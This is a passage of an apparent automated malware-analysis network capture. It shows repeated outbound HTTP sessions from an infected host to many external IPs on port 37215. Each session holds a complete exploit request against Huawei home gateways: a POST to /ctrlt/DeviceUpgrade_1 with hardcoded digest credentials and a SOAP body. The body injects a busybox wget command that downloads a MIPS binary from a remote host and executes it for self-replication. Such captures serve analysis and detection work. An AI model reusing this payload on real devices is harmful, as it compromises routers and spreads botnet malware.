                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          247192.168.2.235564086.164.76.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.155630112 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          248192.168.2.2348768157.66.7.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156219959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          249192.168.2.235638878.155.28.20337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156227112 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          250192.168.2.2339752157.146.41.9637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156249046 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          251192.168.2.2357908197.131.96.24137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156292915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          252192.168.2.2357446157.25.1.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156292915 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          253192.168.2.2356500157.203.174.22137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156296015 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          254192.168.2.2346302197.84.167.8837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156300068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          255192.168.2.2346006197.7.177.4837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156322002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          256192.168.2.235685441.129.186.2537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156398058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          257192.168.2.234227641.223.159.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.156454086 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
